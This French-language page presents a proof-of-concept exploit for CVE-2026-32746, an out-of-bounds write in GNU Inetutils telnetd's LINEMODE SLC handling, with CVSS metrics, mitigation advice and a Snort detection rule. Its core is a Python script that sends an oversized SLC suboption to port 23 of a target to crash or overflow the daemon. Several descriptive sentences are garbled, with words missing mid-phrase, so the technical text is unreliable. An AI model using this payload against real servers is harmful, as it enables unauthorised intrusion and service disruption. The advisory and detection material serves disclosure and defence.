
Preuve de concept d'exploitation pour CVE-2026-32746, une vulnérabilité critique d'exécution de code à distance dans GNU Inetutils telnetd via un débordement de tampon SLC en mode LINEMODE. Inclut une analyse technique, les métriques CVSS et des recommandations d'atténuation.
Vulnérabilité Critique | CVSS 9.8 | Exécution de Code à Distance !
Concerne : GNU Inetutils Telnetd (versions antérieures à 2.7)
Type : Écriture hors limites (OOB Write) dans le gestionnaire de sous-options LINEMODE SLC
Vecteur d'attaque : Réseau (Port 23) | Aucune authentification requise
Impact : RCE avec les privilèges du processus Telnetd
Une écriture hors limites (OOB Write) a été identifiée dans la fonction add_slc du démon de . Cette faille permet à un attaquant distant d' en manipulant les du protocole Telnet.
telnetdadd_slc (traitement des caractères locaux).Un attaquant peut exploiter cette vulnérabilité via un payload Telnet malveillant qui sature le tampon interne :
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload généré pour déborder add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Répétition 600 fois
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Envoi du payload malveillant à {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload livré. Vérification du crash du service/RCE...")
⚠️ AVERTISSEMENT ! Ce code est uniquement à des fins éducatives et de recherche. Son utilisation sur des systèmes sans autorisation est illégale.
| Métrique | Valeur | Description |
|---|---|---|
| Vecteur | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | À distance, sans authentification |
| Score | 9.8 (CRITIQUE) 🔴 | Impact élevé sur la confidentialité, l'intégrité et la disponibilité |
| Publication | 13 mars 2026 | Dernière modification : 5 mai 2026 |
✅ Mettre à jour GNU Inetutils vers la version corrigée (post-2.7).
🔹 Désactiver telnetd et migrer vers SSH (recommandé).
🔹 Bloquer le port 23 sur les pare-feu périmétriques.
🔹 Configurer IDS/IPS pour détecter les séquences LINEMODE SLC anormales.
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)